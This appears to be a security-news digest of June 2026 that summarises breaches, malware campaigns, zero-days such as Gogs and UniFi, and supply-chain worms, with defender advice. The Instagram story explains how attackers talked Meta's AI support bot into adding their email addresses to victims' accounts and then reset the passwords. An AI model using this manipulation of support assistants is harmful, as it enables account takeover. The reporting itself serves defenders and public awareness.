EFF and Wired report that Meta has shipped facial-recognition code in the software for its always-on smart glasses, potentially affecting people both using the glasses and those seen by them. EFF says static analysis confirmed code that stores faceprints as 2,048-value templates and compares newly seen faces against a local database; researchers also showed the feature could be triggered in testing by manually adding a face in debug mode, though it is not yet exposed as a consumer setting.
Why it matters: This is a significant surveillance and privacy story because it suggests consumer wearables may already contain hidden person-identification features before any public rollout. People considering Meta glasses should weigh the privacy risk, and policymakers and civil-society groups may press Meta for transparency, safeguards, or limits before deployment.
Sources
Rindala Alajaji 2026.06.08 97%
This is a direct update to the same underlying event: after the earlier reporting that Meta's smart-glasses app contained active facial-recognition code, EFF now says Meta's June 5 app update removed the face-recognition components, including recognition alerts, biometric-signature handling, and related models/databases.
Cooper Quintin 2026.06.04 100%
This article establishes a new story by documenting previously unreported facial-recognition functionality in Meta's smart-glasses software, with independent technical confirmation rather than merely opinion or advocacy.
Suspected North Korean phishing campaign sends fake developer job offers to steal credentials and cryptocurrency
Social Engineering & Phishing | Malware | Threat Actors & APTs | Scams & Fraud | Technology & Software | Cryptocurrency & Blockchain | GitHub | Visual Studio Code | Cursor
A likely North Korean-linked group sent more than 250 fake job and code-review emails to developers at nearly 100 organizations, mainly in the United States, to steal login credentials and cryptocurrency wallets. Proofpoint tracks the activity as UNK_DeadDrop and says the attackers used spoofed company brands and attacker-controlled GitHub repositories posing as coding tests or crypto projects; victims were told to clone and open the repos in tools such as Visual Studio Code or Cursor, triggering cross-platform malware on macOS, Linux, and Windows.
Why it matters: Developers and the companies that employ them are the direct targets, and a single successful lure can expose source code, cloud access, and crypto assets. Organizations should warn staff about unsolicited recruiting emails, scrutinize GitHub-based coding tests, and isolate or block unknown repositories and scripts.
Sources
2026.06.08 100%
This article appears to be the first tracked report establishing Proofpoint's UNK_DeadDrop campaign as a distinct, likely DPRK-linked operation using fake job offers and code-review lures against developers.
NFCShare Android malware uses fake banking app updates on GitHub to steal payment card data from European bank customers
Malware | Social Engineering & Phishing | Scams & Fraud | Finance & Banking | Technology & Software | Consumers & General Public | GitHub | Android
Attackers are tricking bank customers into installing fake Android banking app updates from GitHub so they can steal card data and PINs. D3Lab says newer NFCShare variants, seen since May 14, target banks mainly in Italy and Spain after victims visit phishing sites impersonating real banks. The malware abuses near-field communication (NFC) on Android to read card details via IsoDep and EMV commands, then sends the data to command-and-control servers over WebSocket.
Why it matters: This can lead directly to payment-card fraud because victims are persuaded to hand over both card details and their PIN during a fake security check. Android users should only install banking apps from Google Play and treat any request to scan a bank card with their phone or sideload an update from GitHub as suspicious.
Sources
Bill Toulas 2026.06.08 100%
This article establishes a concrete, current NFCShare campaign expansion, including new GitHub-hosted delivery infrastructure, broader bank targeting in Europe, and updated technical details on how the malware steals card data.
SoFi says a third-party vendor breach exposed customer data at its Hong Kong securities unit
Breaches & Data Leaks | Finance & Banking | SoFi | SoFi Securities (Hong Kong)
SoFi says hackers got into a database used by SoFi Securities (Hong Kong) Limited through a third-party vendor, potentially exposing customer information. The company said it detected the unauthorized access on April 30, 2026 and is still investigating what data and how many customers were affected. SoFi has not named the vendor, disclosed the attack method, or said whether extortion was involved.
Why it matters: Customers of SoFi Hong Kong could face phishing, fraud, or account-targeting attempts even though the full scope is still unknown. Affected users should be cautious of unsolicited messages, change passwords, enable two-factor authentication where available, and closely monitor financial accounts.
Sources
Lawrence Abrams 2026.06.08 100%
This article appears to be the first tracked report confirming SoFi's disclosure of the vendor-related breach at its Hong Kong subsidiary and establishing the core facts of the incident.
Freedom of the Press Foundation sues DOJ for records on alleged concealment of press protections in FBI raid on Washington Post reporter Hannah Natanson
Information Freedom | Surveillance & Privacy | Policy & Regulation | Government | Media & Entertainment | Nonprofits & NGOs | Legal & Professional Services | DOJ | FBI | Washington Post | Freedom of the Press Foundation
Freedom of the Press Foundation sued the U.S. Department of Justice under the Freedom of Information Act to uncover whether DOJ hid legal protections for journalists when it sought a warrant to raid Washington Post reporter Hannah Natanson’s home. The suit centers on the Privacy Protection Act of 1980, which generally bars newsroom and journalist-home searches, and follows a judge’s February finding that DOJ’s omission of the law from the warrant process seriously undermined confidence in the government’s disclosures.
Why it matters: This matters to journalists, sources, and the public because it suggests federal investigators may be sidestepping legal safeguards meant to stop raids on reporters. The case could reveal whether the Natanson raid was an isolated abuse or part of a broader DOJ practice with implications for press freedom and government surveillance powers.
Sources
Lauren Harper 2026.06.08 100%
This article establishes a distinct new development: a federal FOIA lawsuit seeking records on whether DOJ systematically concealed the Privacy Protection Act from judges in journalist-search warrant cases tied to the Hannah Natanson raid.
Russia-linked Matryoshka disinformation campaign targeted Armenia’s 2026 election with fake news, bot networks, and hoax bomb threats
Disinformation & Influence Ops | Government | Media & Entertainment | Consumers & General Public | Government of Armenia
Researchers and Armenian authorities say a large Russia-linked influence operation targeted Armenia’s parliamentary election with fake stories, manipulated videos, bot amplification, and false bomb threats at polling stations. Antibot4Navalny and the Institute for Strategic Dialogue linked the activity to the Matryoshka campaign, described as part of Russia’s broader Doppelganger operation, which impersonates trusted media and government sources to spread propaganda and election-related falsehoods over an eight-month period.
Why it matters: This is the kind of coordinated deception campaign that can mislead voters, intimidate the public, and erode trust in elections even without hacking voting machines. Platforms, journalists, election officials, and civil society groups should watch for cloned media sites, impersonation, bot-driven amplification, and hybrid tactics such as hoax threats around major votes.
Sources
2026.06.08 100%
The article establishes a distinct, concrete election interference event in Armenia tied to the Matryoshka/Doppelganger Russia-linked influence apparatus, with specific tactics, timing, and impact.
Zcash fixes critical Orchard privacy-pool flaw that could have let attackers create fake ZEC
Zero-Days & CVEs | Urgent Patches | Cryptocurrency & Blockchain | Consumers & General Public | Zcash
Zcash fixed a critical vulnerability in its Orchard shielded transaction system that could have allowed attackers to generate counterfeit ZEC while transactions still appeared valid. Security researcher Taylor Hornby found the issue on May 29 while auditing Orchard; the bug was a failed transaction-input validation check in the zero-knowledge proof workflow, affecting the Orchard privacy pool introduced in 2022. No CVE is cited, and it is unclear whether the flaw was exploited before the fix.
Why it matters: This is the kind of bug that can undermine trust in a cryptocurrency by allowing undetectable fraudulent coin creation. Zcash users, exchanges, and infrastructure operators should confirm they are running the patched software and watch for any follow-up guidance on possible past exploitation.
Sources
Bruce Schneier 2026.06.08 100%
This article establishes a new tracked story because it reports the discovery and remediation of a previously unknown, critical Zcash protocol vulnerability with potential ecosystem-wide financial impact, and no existing tracked story covers this event.
Unpatched Gogs zero-day lets attackers run code on self-hosted Git servers
Urgent Patches | Supply Chain | Zero-Days & CVEs | Technology & Software | Gogs
A newly disclosed flaw in Gogs can let attackers take over internet-exposed code servers if they can register a normal user account. The unpatched argument-injection vulnerability, not yet assigned a CVE, affects Gogs 0.14.2 and 0.15.0+dev and is triggered during the "Rebase before merging" pull-request flow; because open registration is enabled by default, many default-configured servers may be reachable by unauthenticated attackers who simply sign up first. Rapid7 says successful exploitation can lead to remote code execution as the server process user, access to private repositories, and theft of password hashes, API tokens, SSH keys, and 2FA secrets.
Why it matters: Organizations running self-hosted Gogs should treat this as urgent because exposed servers may be compromisable even without an existing attacker account. Until a fix is available, admins should disable open registration, restrict internet exposure, and review whether rebase-merging can be turned off or tightly limited.
Sources
Sergiu Gatlan 2026.06.08 98%
This article is a direct update to the same Gogs argument-injection zero-day: it adds that Gogs released version 0.14.3 on June 7 to fix the flaw, requested a CVE, and published concrete mitigations for users who cannot patch immediately.
2026.05.29 98%
This article is the same underlying Gogs zero-day event and adds that there is still no official fix, Rapid7 has now published a Metasploit exploit module, the researcher says maintainers stopped responding after March 28, and a proposed patch has been submitted while users are urged to disable registration and rebase merging.
Ionut Arghire 2026.05.29 98%
This article is a direct report on the same Gogs zero-day event, adding technical detail from Rapid7 on the argument-injection root cause, the 'Rebase before merging' attack path via malicious branch names, default open registration risk, cross-platform impact, lack of a patch, and the release of a Metasploit module and indicators of compromise.
info@thehackernews.com (The Hacker News) 2026.05.28 97%
This article appears to cover the same underlying Gogs authenticated remote code execution issue, adding another report that characterizes it as critical and exploitable by any authenticated user on affected self-hosted servers.
Sergiu Gatlan 2026.05.28 100%
This article establishes a distinct new Gogs zero-day event: a newly disclosed, unpatched remote-code-execution flaw in current Gogs releases, separate from the earlier CVE-2025-8110 zero-day mentioned only as background.
Chained UniFi OS Server flaws CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910 can give attackers root access without logging in
Zero-Days & CVEs | Urgent Patches | Technology & Software | Consumers & General Public | Ubiquiti
Researchers say attackers can take over vulnerable UniFi OS Server systems without a password and gain full root control. Bishop Fox showed that three patched bugs in UniFi OS Server 5.0.6 and earlier—CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910—can be chained from the network to bypass authentication, read files, and trigger command injection, leading to remote code execution and trivial privilege escalation via passwordless sudo.
Why it matters: UniFi OS Server can manage core business systems such as networking, cameras, and door access, so compromise can hand attackers broad control of an organization’s environment. Organizations using affected versions should patch immediately and check for suspicious requests to the noted endpoints, because the attack leaves little or no login evidence.
Sources
Bill Toulas 2026.06.08 100%
This article establishes a distinct story by surfacing a newly detailed exploit chain and defender guidance for three UniFi OS Server CVEs that together enable unauthenticated root-level remote code execution.
Full page
Ransomware attack shuts Evanston Township High School in Illinois and disrupts summer programs
Ransomware · Education · Evanston Township High School · FBI
A ransomware attack forced Evanston Township High School in Illinois to close for at least two days, canceling summer school, sports camps, and other on-campus activities. The school said phone systems are down and staff have limited access to email, Google accounts, and other network systems including eSchool. External forensics specialists and breach counsel were engaged, and the FBI is involved. No ransomware group has publicly claimed responsibility yet.
Why it matters: This is a real-world operational disruption affecting students, families, and staff, not just an IT outage. Schools and local governments should review incident response readiness, offline recovery options, and communications plans, while affected families should watch for follow-up notices about any data exposure.
Sources
2026.06.08 100%
The article establishes a distinct incident at Evanston Township High School with confirmed ransomware, active recovery, and school closures.
Full page
Powys Council says cyberattack affected 13 schools in Wales and exposed some staff and pupil data
Breaches & Data Leaks · Government · Education · Powys County Council
A separate cyberattack in Powys, Wales affected systems used by 13 schools, and the council says personal data belonging to staff and pupils was accessed. Current information indicates data was taken from one of the affected schools, but officials have not named the schools involved, the number of people affected, or the exact data types because of the sensitivity of the incident. The council has not confirmed ransomware or identified the attacker.
Why it matters: This affects children, school staff, and families, and may carry identity-fraud and privacy risks even though schools remain open. People connected to Powys schools should monitor official notifications and be cautious about phishing or scam messages that use school-related details.
Sources
2026.06.08 100%
The article introduces a separate, clearly scoped Wales school-sector breach with confirmed unauthorized access to personal data and no matching tracked story.
Full page
Russia updates SORM surveillance rules to expand automated tracking of citizens' online activity
Surveillance & Privacy · Policy & Regulation · Government · Technology & Software · Telecommunications · Consumers & General Public · Roskomnadzor
Russia has updated the technical rules for its SORM surveillance system, expanding how authorities can search and connect people's internet and communications data. The new regulations require broader collection, processing, and transmission of identifiers including names, passport and tax numbers, addresses, usernames, domains, URLs, device identifiers, and geolocation data. The rules apply beyond telecom carriers to other online service operators and increase compliance burdens on providers.
Why it matters: This matters because it strengthens Russia's ability to monitor individuals without shutting the internet off, making targeted repression and self-censorship easier while pressuring providers to integrate with state surveillance systems. The impact is immediate for people and companies operating in Russia, especially telecom and internet services that may need to change infrastructure or face regulatory penalties.
Sources
2026.06.08 100%
The article centers on a specific new regulatory change published by Russia's Ministry of Digital Development that upgrades SORM's data-search and integration requirements, establishing a distinct surveillance-policy story not represented in the existing tracked items.
Full page
Mini Shai-Hulud supply-chain attack compromises 320+ npm packages in @antv namespace via stolen maintainer account
Supply Chain · Malware · Threat Actors & APTs · Technology & Software · Cryptocurrency & Blockchain · npm · GitHub · Microsoft
Researchers say a compromised npm maintainer account ('atool') was used to publish hundreds of malicious package versions across the @antv namespace, including downstream widely used packages such as echarts-for-react and timeago.js. The payload steals GitHub Actions secrets and credentials from cloud, Kubernetes, Vault, wallet, and developer-tool paths, exfiltrates data via GitHub and fallback infrastructure, and can republish tampered packages using stolen npm tokens. Reports also link the campaign to malicious PyPI uploads, a compromised GitHub Action, and a VS Code extension.
Why it matters: This is a high-impact ecosystem compromise with downstream risk to developer workstations, CI environments, and software consumers through trusted package updates. Defenders should immediately identify affected package versions, rotate exposed secrets and npm tokens, review CI runners and GitHub repositories for exfiltration, and block known malicious artifacts.
Sources
2026.06.08 63%
This article ties the Microsoft GitHub repository compromises to the broader Mini Shai-Hulud/Miasma worm ecosystem, adding that a descendant worm was used to push malicious commits into more than 70 Microsoft repositories and break Azure-related CI/CD workflows.
2026.06.01 60%
The article says the Red Hat compromise used a Mini Shai-Hulud variant and notes the malware was recently open-sourced, which connects it technically to the broader Mini Shai-Hulud campaign, but this is a distinct compromise affecting different packages, accounts, and victims.
Ionut Arghire 2026.05.20 100%
The article establishes a distinct new Mini Shai-Hulud campaign centered on a compromised npm maintainer account and malicious releases across the @antv ecosystem, rather than updating one of the existing tracked stories.
2026.05.18 78%
This article extends the same broader Shai-Hulud/TeamPCP npm supply-chain campaign by reporting a copycat worm in a new package (chalk-tempalte) plus three additional malicious npm packages from the same actor, including stealers and a DDoS bot component, shortly after TeamPCP open-sourced the worm.
2026.05.18 41%
The article says the TanStack compromise used code from the Shai-Hulud worm published by TeamPCP, providing additional context on the malware family and tradecraft, but the core event here is the TanStack attack rather than the @antv compromise itself.
Full page
Attackers exploit Everest Forms Pro WordPress plugin flaw CVE-2026-3300 to take over sites
Zero-Days & CVEs · Technology & Software · Consumers & General Public · WordPress · Everest Forms
Hackers are actively exploiting a critical bug in the Everest Forms Pro WordPress plugin to seize control of vulnerable websites. The flaw, CVE-2026-3300, affects Everest Forms Pro 1.9.12 and earlier and allows unauthenticated remote code execution through the plugin’s Complex Calculation feature, which unsafely passes form input into PHP eval(). Wordfence says attacks began by April 13 and are creating rogue administrator accounts, including one named “diksimarina.”
Why it matters: Affected WordPress sites can be fully hijacked without a login, allowing attackers to add admin users, install backdoors, and alter site content. Site owners should update immediately, review administrator accounts and logs for suspicious activity, and check for indicators tied to the reported campaign.
Sources
Ionut Arghire 2026.06.08 98%
This article is the same underlying event and adds detail that exploitation began on April 13, Defiant blocked over 29,000 attempts, the attacks often created an admin account named 'diksimarina', and the bug stems from unsafe handling in the Complex Calculation feature despite a March patch in version 1.9.13.
Bill Toulas 2026.06.06 100%
This article establishes a distinct new story around active exploitation of CVE-2026-3300 in Everest Forms Pro, including affected versions, exploitation details, attacker behavior, and defender guidance.
Full page
Lansing Community College says 174,000 people were affected by a 2025 breach using compromised credentials
Breaches & Data Leaks · Education · Consumers & General Public · Lansing Community College
Lansing Community College says hackers got into some of its systems in February 2025 and exposed personal information belonging to more than 174,000 people. The school says the intrusion began with compromised credentials and affected data can include names, addresses, dates of birth, driver's license details, and Social Security numbers, with the exact data varying by person. LCC says it found the incident about a week after the access began and has not identified the threat actor publicly.
Why it matters: This is a large education-sector breach involving identity data that can be used for fraud, tax scams, and account takeover. Affected people should watch for notice letters, enroll in credit monitoring, and consider fraud alerts or credit freezes.
Sources
Ionut Arghire 2026.06.08 100%
This article appears to be the initial broad public reporting of Lansing Community College's disclosure, including victim count, attack timing, access method, and the categories of personal data exposed.
Full page
Oxford University says CareerConnect breach at supplier Group GTI exposed user names, emails, and some passwords
Social Engineering & Phishing · Supply Chain · Breaches & Data Leaks · Education · Technology & Software · Oxford University · Group GTI · TargetConnect
Oxford University says a separate breach at its CareerConnect jobs platform exposed users’ full names and email addresses, and encrypted passwords for people not using single sign-on. The affected service is provided by Group GTI and runs on its TargetConnect platform, which Oxford said was compromised on May 28 through an unspecified security vulnerability that has since been fixed; affected alumni, research staff, and employer users had passwords reset, and GTI has not publicly disclosed the flaw or total scope.
Why it matters: Students, alumni, staff, and recruiters who used the platform may now face phishing or credential-stuffing attempts, especially if they reused passwords elsewhere. Affected users should reset any reused passwords and watch for convincing job-related scam emails, and universities using GTI TargetConnect should press the vendor for technical details and mitigation guidance.
Sources
Sergiu Gatlan 2026.06.08 99%
This article is the same underlying event: Oxford's disclosure that Group GTI's CareerConnect platform was compromised on May 28, exposing names, email addresses, and encrypted passwords for some non-SSO users. It adds Oxford's warning that the intrusion appeared focused on gathering credentials for later phishing and confirms GTI invalidated affected locally set passwords.
2026.06.06 100%
This article establishes a distinct new breach event: an intrusion into Oxford's third-party careers platform provider Group GTI/TargetConnect, explicitly separate from the earlier Canvas incident.
Full page
FBI warns Silent Ransom Group is sending fake IT workers in person to law firms to plug in USB drives and steal data
Threat Actors & APTs · Ransomware · Scams & Fraud · Social Engineering & Phishing · Breaches & Data Leaks · Legal & Professional Services · FBI
The FBI says Silent Ransom Group is targeting U.S. law firms by pretending to be IT support, then stealing data and extorting victims without encrypting files. In 2026 attacks, the group reportedly used callback phishing emails, phone-based social engineering, remote desktop access, and in some cases sent an operative on site to insert a USB or external drive after a failed remote-access attempt; the attackers then used tools such as WinSCP and Rclone to exfiltrate data.
Why it matters: Law firms and other organizations should treat unsolicited IT calls, emails, and in-person support visits as potential attack vectors, not just remote phishing. The warning is urgent because the attackers use legitimate admin tools and leave few traces, so organizations should verify IT identities, restrict external-drive use, and harden remote-access workflows now.
Sources
Ionut Arghire 2026.06.08 84%
This updates the same underlying Silent Ransom Group campaign targeting U.S. law firms. It adds new reporting that the group is using DNS fast flux infrastructure, with compromised IoT/CPE devices across 18 countries and domains including ep6pheij[.]com and business-data-leaks[.]com, alongside the previously reported vishing, remote-access, and in-person USB tactics.
Lawrence Abrams 2026.06.07 96%
This article covers the same Silent Ransom Group campaign against U.S. law firms and adds Mandiant’s technical details on the attack chain: invoice-themed precursor emails, follow-up fake IT support calls, use of Teams/Zoom/Quick Assist/Terminal Services, deployment of remote-management tools like AnyDesk and Zoho Assist, phishing domain patterns, use of Privnote, and rapid data theft and extortion timelines.
2026.06.05 96%
This article covers the same underlying Silent Ransom Group/UNC3753 campaign and adds Mandiant reporting that dozens of banks, law firms, and professional-services firms were targeted from January through May 2026, that the group is also tracked as Luna Moth and Chatty Spider, and that Mandiant observed very rapid operations with data theft and extortion sometimes beginning within an hour.
2026.05.27 97%
This article is a direct report on the same FBI advisory, adding detail that fresh in-person incidents were reported in Spring 2026 and describing the crew's tactics, including impersonating IT staff, using callback phishing, remote desktop access, WinSCP, disguised Rclone, and cloud file-sharing services to steal data for extortion.
2026.05.27 98%
This article directly reports the same FBI advisory on Silent Ransom Group (also Luna Moth/UNC3753) targeting U.S. law firms with phishing, fake help-desk calls, remote-access social engineering, and in-person visits to copy data onto USB or hard drives. It adds context that the group is linked to the defunct Conti syndicate, has targeted law firms since 2023, and uses trusted tools and cloud services like OneDrive and Google Drive to blend in.
Sergiu Gatlan 2026.05.27 99%
This article is the same underlying event: the FBI flash alert on Silent Ransom Group's in-person and remote social-engineering attacks against U.S. law firms. It adds detail that SRG first tries phone and phishing lures to obtain remote desktop access, then may dispatch someone on-site to connect USB or external drives if that fails, and reiterates links to Luna Moth/UNC3753 and prior callback-phishing activity.
Ionut Arghire 2026.05.27 100%
This article appears to establish a distinct FBI-tracked development in Silent Ransom Group tradecraft: in-person operatives physically inserting devices to support data theft and extortion targeting law firms.
Full page
CISA says attackers are exploiting SolarWinds Serv-U denial-of-service flaw CVE-2026-28318
Urgent Patches · Zero-Days & CVEs · Technology & Software · SolarWinds · CISA
CISA says hackers are now actively exploiting a recently patched SolarWinds Serv-U bug to crash exposed file-transfer servers. The flaw, CVE-2026-28318, affects SolarWinds Serv-U MFT and FTP software on Windows and Linux and can be triggered without authentication using specially crafted POST requests with Content-Encoding: deflate; SolarWinds fixed it in Serv-U 15.5.4 Hotfix 1 and advised admins who cannot patch to restrict access and block such requests.
Why it matters: Organizations running internet-exposed Serv-U servers could face service outages right now, including federal agencies ordered to remediate by June 19. If you use Serv-U, patch immediately or apply SolarWinds' temporary filtering and access restrictions while checking for signs of attempted abuse.
Sources
Ionut Arghire 2026.06.08 98%
This is the same underlying event: active exploitation of SolarWinds Serv-U CVE-2026-28318. The article adds patch timing details, notes the fix is Serv-U 15.5.4 Hotfix 1, explains the unauthenticated specially crafted POST request with the 'Content-Encoding: deflate' header, and reiterates affected/EoL versions and CISA's June 19 federal patch deadline.
info@thehackernews.com (The Hacker News) 2026.06.06 99%
It covers the same underlying event: CISA adding the actively exploited SolarWinds Serv-U flaw CVE-2026-28318 to the Known Exploited Vulnerabilities catalog, reinforcing the exploitation status and remediation urgency for affected organizations.
Sergiu Gatlan 2026.06.05 100%
This article establishes a new tracked story because it is the first item here tying SolarWinds Serv-U CVE-2026-28318 to active exploitation and CISA KEV inclusion.
Full page
Attackers used Meta’s Instagram AI support bot to reset passwords and hijack accounts
Breaches & Data Leaks · Social Engineering & Phishing · Government · Defense & Aerospace · Technology & Software · Consumers & General Public · Meta · Instagram · Obama White House · U.S. Space Force
Attackers used Meta’s automated Instagram support assistant to take over accounts, including the Obama White House account and the U.S. Space Force chief master sergeant account, and briefly deface them with pro-Iran messages. According to KrebsOnSecurity and Telegram posts cited in the report, the abuse involved the password-recovery flow: attackers asked the AI bot to add a new email address to a target account, then used the one-time code sent there to reset the password. No CVE is given, Meta reportedly pushed an emergency patch, and accounts with multi-factor authentication enabled were said to resist the takeover.
Why it matters: This matters because it shows AI-driven customer support can become a new social-engineering path to account takeover even without a backend database breach. Instagram users, especially high-value or public-facing accounts, should enable multi-factor authentication now and review account recovery email addresses and recent login activity.
Sources
Eduard Kovacs 2026.06.08 98%
This is the same underlying event: abuse of Meta’s AI-powered Instagram account recovery/support workflow to reset passwords and hijack accounts. It adds Meta’s disclosure that 20,225 accounts were potentially affected, the discovery date (May 31), a precise explanation of the email-verification bug in the High Touch Support tool, and remediation steps including disabling the tool, invalidating reset links, and forcing security checkpoints.
Sergiu Gatlan 2026.06.08 99%
This is the same underlying event: abuse of Meta's High Touch Support AI-assisted Instagram recovery flow to issue password reset links and hijack accounts. The article adds Meta's breach disclosure, an estimated impact of over 20,000 stolen accounts, timeline details including discovery on May 31 and breach activity dating to April 17, and Meta's response steps such as disabling HTS, invalidating reset links, and requiring account re-authentication.
Bruce Schneier 2026.06.04 98%
This is the same underlying event: attackers abused Meta’s Instagram AI support assistant to add attacker-controlled email addresses, receive verification codes, and trigger password resets for victim accounts; this source adds that Meta spokesperson Andy Stone said the issue was fixed.
Bill Toulas 2026.06.02 99%
This is the same underlying event: attackers abused Meta’s AI-powered Instagram support and recovery process to change account email addresses, bypass recovery safeguards including selfie verification and reportedly 2FA, and hijack high-value accounts such as the Obama White House account. This source adds reporting on victims being trapped in AI-only recovery loops, claims that AI-generated animated selfies were accepted for identity checks, and Meta communications VP Andy Stone’s statement that the issue was resolved and impacted accounts were being secured.
Ionut Arghire 2026.06.02 99%
This article covers the same underlying event and adds specifics on the attack path: a confused-deputy logic flaw in Meta’s AI-powered recovery assistant let attackers relink victim accounts to new email addresses, use VPNs to mimic victims’ locations, sometimes submit AI-modified selfies, and then reset passwords without effective 2FA blocking. It also says Meta has now fixed the issue.
BrianKrebs 2026.06.01 100%
This article appears to be the first concrete report tying a specific Meta AI support-bot recovery flaw to real Instagram account hijackings and visible defacements.
Full page
C0XMO Gafgyt botnet exploits DD-WRT router flaw CVE-2021-27137 to spread across routers and IoT devices
Malware · Threat Actors & APTs · Zero-Days & CVEs · Technology & Software · Telecommunications · Consumers & General Public · DD-WRT
A new botnet called C0XMO is infecting DD-WRT routers and other internet-connected devices so they can be used in denial-of-service attacks. Fortinet says the malware exploits CVE-2021-27137, an unauthenticated buffer overflow in DD-WRT, and also brute-forces Telnet and SSH logins while carrying binaries for multiple CPU architectures including ARM, MIPS, PowerPC, x86, and x86_64. The botnet establishes persistence with cron jobs and startup-file changes, then removes rival malware and tooling from infected systems.
Why it matters: Organizations and users with exposed routers, DVRs, and similar devices may be silently pulled into a botnet and used in attacks. Patch affected firmware where available, disable unnecessary remote administration, and change weak or reused device credentials immediately.
Sources
Bill Toulas 2026.06.07 100%
This article appears to be the first tracked item establishing the C0XMO botnet campaign and its use of CVE-2021-27137 in DD-WRT devices.
Full page
Polyfill.io remnants trigger rogue login prompts on Toshiba, Muji and other websites
Supply Chain · Social Engineering & Phishing · Manufacturing · Retail & E-Commerce · Technology & Software · Consumers & General Public · Toshiba · Muji · Polyfill.io
Toshiba and Muji warned that visitors to some of their web pages saw unexpected browser sign-in prompts that could trick people into entering credentials. The prompts were tied to lingering references to the compromised polyfill.io JavaScript content delivery network (CDN), which began responding with HTTP 401 authentication challenges in late May 2026; affected companies removed or suspended the service, and no confirmed credential theft has been reported so far.
Why it matters: People who entered usernames or passwords into these pop-ups should change them, and website owners should remove any remaining polyfill.io code immediately. This matters because it shows how a long-abandoned third-party script can still create phishing risk years after an earlier supply-chain compromise.
Sources
Bill Toulas 2026.06.05 100%
This article establishes a distinct 2026 follow-on event from the earlier Polyfill compromise: dormant polyfill.io inclusions on live sites caused browser credential prompts on major websites, creating a fresh user-facing phishing risk.
Full page
China-linked UNC5221 used Brickstorm, Plenet and AgentPSD malware to keep long-term access to victim networks and Microsoft 365
Threat Actors & APTs · Malware · Technology & Software · Legal & Professional Services · Microsoft · Egnyte · Netgate · Synology
A China-linked espionage group kept access to a victim organization and its managed services provider for at least 18 months, using multiple backdoors to return even after cleanup. Volexity says UNC5221, also tracked as VerdantBamboo, used Brickstorm on Egnyte Storage Sync, pfSense, Synology NAS and a retired Linux email server, then used Plenet (also called Grimbolt) and AgentPSD to maintain persistence and reach the victim’s Microsoft 365 environment through stolen credentials and SSL VPN access. No new CVE is named in this report.
Why it matters: Organizations using Microsoft 365, MSPs, and internet-facing edge devices should treat this as a reminder that sophisticated attackers can survive remediation and re-enter through trusted providers. Review VPN and firewall changes, hunt for Brickstorm/Plenet/AgentPSD, audit MSP access paths, and rotate credentials and tokens tied to compromised systems.
Sources
Bill Toulas 2026.06.05 100%
This article establishes a distinct incident report on UNC5221/VerdantBamboo intrusions, adding newly documented malware and concrete details about persistence through an MSP and Microsoft 365 access rather than updating one of the existing tracked stories.
Full page
Suspected Iranian hackers accessed internet-exposed gas station tank monitors across multiple U.S. states
Policy & Regulation · Information Freedom · Urgent Patches · Threat Actors & APTs · Energy & Utilities · Retail & E-Commerce · CISA
U.S. officials believe suspected Iranian hackers broke into fuel-tank monitoring systems at gas stations in several states. The attackers targeted automatic tank gauges, or ATG systems, that were exposed online without passwords and changed displayed readings but reportedly could not alter actual fuel volumes. No physical damage has been reported, but officials warned the access could potentially hide leaks or create other safety and critical-infrastructure risks.
Why it matters: Gas stations and operators using older internet-connected monitoring gear may be at risk right now, especially if devices are reachable online without authentication. Operators should immediately remove ATG systems from direct internet exposure, require passwords, and review logs and display anomalies.
Sources
Sergiu Gatlan 2026.06.05 96%
This is a direct update on the same ATG gas-station tank-monitoring intrusion wave, adding the joint CISA/FBI/NSA advisory, details on likely attack methods, and Shadowserver's count of 1,061 exposed ATG systems globally, including 909 in the U.S.
SecurityWeek News 2026.06.05 76%
It ties the broader multi-agency U.S. warning on exposed Automatic Tank Gauge systems to the previously reported Iran-linked compromises of gas-station tank monitors and reiterates the immediate mitigation guidance to disconnect exposed systems from the internet.
Lawrence Abrams 2026.06.03 94%
This is a direct government follow-up to the same tank-monitoring intrusion activity previously reported by CNN, adding an official multi-agency advisory, broader sector impact beyond gas stations, and specific attack methods and mitigations. It also notes the activity remains unattributed in the advisory despite earlier reporting pointing to suspected Iranian involvement.
SecurityWeek News 2026.05.22 100%
This article establishes a distinct critical-infrastructure intrusion story involving suspected Iranian access to exposed gas station ATG systems across multiple states.
Full page
European Commission proposes tech sovereignty package covering chips, cloud, AI and open-source security
Policy & Regulation · Supply Chain · Government · Technology & Software · Manufacturing · European Commission
The European Commission unveiled a new tech sovereignty package meant to reduce the European Union's dependence on U.S. and Chinese technology suppliers. The package includes draft laws for semiconductors and cloud and AI infrastructure, plus an Open Source Strategy that would fund maintenance and security for critical open-source components and push public-sector procurement toward open technologies as part of broader digital resilience planning.
Why it matters: This matters to governments, public-sector buyers, vendors, and defenders because it could reshape which technologies Europe relies on for critical systems and how security funding is directed, especially for open-source components that underpin widely used infrastructure. Organizations should watch the legislative process, procurement changes, and any resulting security requirements for cloud, AI, and software supply chains.
Sources
2026.06.05 100%
This article establishes a new story around the EU's specific 2026 tech sovereignty legislative package and strategy rollout, rather than updating an existing tracked event.
Full page
Microsoft links GPU cryptojacking malware campaign to poisoned search results and AI chatbot software recommendations
Social Engineering & Phishing · Malware · Scams & Fraud · Technology & Software · Cryptocurrency & Blockchain · Consumers & General Public · Microsoft
Attackers are tricking people looking for popular PC utilities into installing malware that secretly uses their graphics cards to mine cryptocurrency. Microsoft says the campaign uses search-engine optimization (SEO) poisoning and, in some cases, attacker-controlled links surfaced in AI chatbot responses for tools such as CrystalDiskInfo, HWMonitor, FurMark, K-Lite Codec Pack, PDFgear, and Display Driver Uninstaller. The fake downloads bundle a legitimate program with a malicious dynamic-link library (DLL), install ScreenConnect for remote access, add multiple Windows persistence mechanisms, evade Microsoft Defender, and then deploy GPU miners including gminer, lolMiner, and SRBMiner-MULTI.
Why it matters: This campaign targets owners of powerful Windows systems and can leave victims with both hijacked hardware and a remote-access backdoor for follow-on attacks. Users and defenders should avoid downloading software from AI-generated or unfamiliar links, verify vendor domains, and hunt for the listed indicators of compromise and unauthorized ScreenConnect installs.
Sources
SecurityWeek News 2026.06.05 91%
It summarizes Microsoft’s findings that attackers are abusing both SEO poisoning and AI chatbot recommendations to deliver fake utilities, then using ScreenConnect and process hollowing to deploy GPU-focused cryptominers.
Ionut Ilascu 2026.05.27 100%
This article establishes a distinct Microsoft-documented malware campaign centered on SEO poisoning and AI chatbot link manipulation to deliver GPU-mining malware and persistent remote access.
Full page
Sophos says ransomware operator used AI agents from Cursor and Claude to build EDR-evasion and Active Directory attack tools
Malware · Threat Actors & APTs · Ransomware
